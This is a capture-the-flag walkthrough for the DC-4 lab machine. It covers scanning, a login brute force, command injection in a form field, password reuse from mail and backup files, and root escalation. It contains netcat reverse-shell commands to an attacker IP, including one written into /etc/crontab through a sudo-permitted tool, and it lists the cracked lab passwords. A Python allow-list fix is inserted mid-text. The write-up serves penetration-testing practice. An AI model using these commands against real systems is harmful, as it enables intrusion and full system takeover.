DC-4 Target Machine Penetration Test

1. Penetration Process

  • Host discovery

```bash
nmap -sP 192.168.0.1/24
```
  • Found the IP address: 192.168.0.123

  • Port scan

```
root@kali:~/workspace# nmap -sS -A -p- 192.168.0.123
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-03 14:49 CST
Nmap scan report for 192.168.0.123
Host is up (0.00025s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
| 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open http nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
MAC Address: 00:0C:29:84:3B:AB (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
  • Take a look at port 80

  • There is only a login form

  • Capture a request and try it

  • First check whether there is SQL injection

```bash
sqlmap -u http://192.168.0.123 --data "username=admin&password=1122"
```
  • No SQL injection found

  • Scan for directories

```bash
dirb http://192.168.0.123
```
  • Still nothing~

  • Is brute force the only way left?

  • Brute-forced the login with Burp Suite

  • Got the credentials: admin : happy

  • Then log in

  • It is a page that executes commands~

  • But it only offers a few simple commands

  • Then capture a request, and it turns out the command is not filtered at all; it is submitted as-is.

```http
POST /command.php HTTP/1.1
Host: 192.168.0.123
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: http://192.168.0.123
Connection: close
Referer: http://192.168.0.123/command.php
Cookie: PHPSESSID=jj07s1dhaif60k528ttntgbfb3
Upgrade-Insecure-Requests: 1

radio=ls+-l&submit=Run
```
  • We can change the radio value to a reverse shell command

  • First listen on port 8899: nc -lvp 8899

  • Then change the radio value to: nc 192.168.0.21 8899 -e /bin/bash
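The root cause here is that command.php trusts the `radio` value exactly as submitted. As an added example (not code from the DC-4 box), this is how a server-side allow-list would close the hole: the form value is only a key into a fixed table of argv lists, nothing from the request ever reaches a shell, and any other value is rejected and logged. Only `ls -l` appears in the captured request; the other two table entries and the `/tmp` working directory are assumptions.

```python
"""Server-side allow-list for a "run a predefined command" form.

Added example, not the DC-4 box's own command.php: the form value is used
only as a key into a fixed table of argv lists, so an intercepted request
that carries a different command is rejected rather than executed.
"""
import subprocess
from typing import Optional
from urllib.parse import parse_qs

# Constructed table. "ls -l" is the value seen in the captured request;
# the other two entries are assumed options of the form.
ALLOWED_COMMANDS = {
    "ls -l": ["ls", "-l"],
    "du -h": ["du", "-h"],
    "df -h": ["df", "-h"],
}


def resolve_command(radio_value: str) -> Optional[list]:
    """Exact match against the table; no prefix matching, no shell parsing."""
    return ALLOWED_COMMANDS.get(radio_value.strip())


def check_request_body(body: str) -> tuple:
    """Validate a raw x-www-form-urlencoded body as command.php receives it.

    Returns (accepted, detail). A rejected value is worth logging: it is the
    signal that someone edited the request outside the form's options.
    """
    fields = parse_qs(body, keep_blank_values=True)
    values = fields.get("radio", [])
    if len(values) != 1:
        return False, "radio must appear exactly once"
    if resolve_command(values[0]) is None:
        return False, f"radio value not in allow-list: {values[0]!r}"
    return True, values[0]


def run_form_command(body: str, cwd: str = "/tmp") -> tuple:
    """Return (HTTP status, output). cwd is an assumed working directory."""
    accepted, detail = check_request_body(body)
    if not accepted:
        return 400, detail
    argv = resolve_command(detail)
    # shell=False and a fixed argv: the request text never reaches a shell.
    proc = subprocess.run(argv, cwd=cwd, capture_output=True, text=True,
                          timeout=5, shell=False)
    return 200, proc.stdout


if __name__ == "__main__":
    print(run_form_command("radio=ls+-l&submit=Run"))
    print(run_form_command("radio=ls+-l%3Bid&submit=Run"))
```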

  • Once we have a shell we can see there are three users

```
charles  jim  sam
```
  • And only jim's home directory has anything in it:

  • backups  mbox  test.sh

    - But mbox cannot be read

    - Not sure what `test.sh` is for either

    - In jim/backups there is an old-passwords.bak, so use it to brute-force jim's SSH password

    ```bash
    hydra -l jim -P old-passwords.bak ssh://192.168.0.123
    ```
  • Got the password: host: 192.168.0.123 login: jim password: jibril04

  • Then log in as jim and try to escalate further

  • Now mbox can be read

```
jim@dc-4:~$ cat mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
(envelope-from <root@dc-4>)
id 1hCiQe-0000gc-EC
for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO

This is a test.
```
  • It is mail. Mail is normally stored under /var/mail

```
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is: ^xHhA&hvim0y

See ya,
Charles
```
  • Found charles's password: ^xHhA&hvim0y

  • Switch to charles first

```bash
su charles
```
  • After logging in, sudo -l shows

```
charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
(root) NOPASSWD: /usr/bin/teehee
```
  • Use /usr/bin/teehee to escalate privileges

```bash
sudo /usr/bin/teehee -a /etc/crontab */1 * * * * nc 192.168.0.21 8899 -e /bin/bash
```
  • Listen on port 8899 on kali and wait 1 minute

  • Then we have a root shell

  • flag

!!!THE_END!!!

2. Important Data

```
# 1. Website credentials:
admin : happy
# 2. jim's SSH password
jibril04
# 3. charles's SSH password
^xHhA&hvim0y
```